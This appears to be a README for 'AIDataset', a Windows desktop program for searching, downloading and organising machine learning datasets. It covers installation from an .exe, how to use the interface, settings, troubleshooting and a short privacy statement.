📁 AIDataset - Browse major AI research areas quickly

AIDataset helps researchers and students find data for machine learning projects. You can search, filter, and organize massive collections of information across several fields. This tool simplifies the process of finding the right set for your specific AI model.

🚀 Getting Started

This application runs on Windows systems. You do not need technical skills to use it. The software works as a desktop program that allows you to manage datasets locally on your computer.

System Requirements

Your computer must meet these basic needs to run the software smoothly:

  • Operating System: Windows 10 or Windows 11 (64-bit).
  • Memory: 8 GB of RAM.
  • Storage: 500 MB of free disk space.
  • Internet: Required to download data collections.

📥 Installing the Software

Follow these steps to set up the software on your computer.

  1. Visit the official releases page to access the installer.
  2. Look for the file ending in .exe under the latest release.
  3. Click the file name to start the download.
  4. Save the file to your Downloads folder.
  5. Open your Downloads folder and double-click the file named AIDataset-Installer.exe.
  6. A box might appear on your screen asking for permission to install. Select Yes to proceed.
  7. Follow the prompts on the screen to finish the installation.
  8. Locate the AIDataset icon on your desktop and double-click it to start the program.

🔍 How to Use the Application

The interface features a main search bar and a sidebar for filtering results. You can use the search bar to type keywords such as "computer vision," "natural language processing," or "robotics."

Working with Datasets

When you find a dataset, click the card to see more details. You will see information about the size, format, and license of the data.

To download a set, click the Get Data button. The program will save the files to a local folder on your computer. You choose this folder location in the Settings menu.

Managing Your Library

The library tab tracks every download. You can sort these files by size, date, or category. If you want to remove a set, right-click the item and select Delete. This action removes the data files from your computer and clears the record from your library view.

⚙️ Configuration Settings

You can change how the software behaves through the Settings menu. Click the gear icon in the top right corner to access these options.

  • Download Path: Change this to select where the program stores your data files.
  • Theme: Toggle between Light Mode and Dark Mode to match your desktop preferences.
  • Update Check: The software checks for new versions of the application automatically. You can turn this off if you prefer to update manually.

🆘 Troubleshooting Common Issues

If the program does not open, try these steps first.

  • Restart your computer.
  • Check your internet connection.
  • Right-click the desktop icon and select Run as Administrator.
  • If the problem persists, uninstall the program and download a fresh copy from the link provided above.

Make sure you have enough space on your hard drive. The application requires extra space to unpack files before they appear in your local library. If your drive is full, the program may stop during the download process.

🛡️ Privacy and Data

This application only connects to the internet to download datasets or check for software updates. It does not send your personal browsing data to external servers. Your downloaded datasets stay on your machine unless you remove them. The software respects your privacy and works offline for basic library management.

📊 Supported Research Areas

The application currently supports categories that cover the most active parts of modern science. You will find entries for these topics:

  • Image Processing: Datasets for pattern recognition and image classification.
  • Text Analysis: Large corpora for training language models and sentiment analysis tools.
  • Audio Recognition: Collections for voice testing and sound classification.
  • Predictive Analytics: Historical data used to forecast trends in finance or meteorology.

The list updates as new research comes out. You can refresh the global list of datasets by clicking the Sync button located at the bottom of the sidebar. This ensures you see the latest additions from the online index.
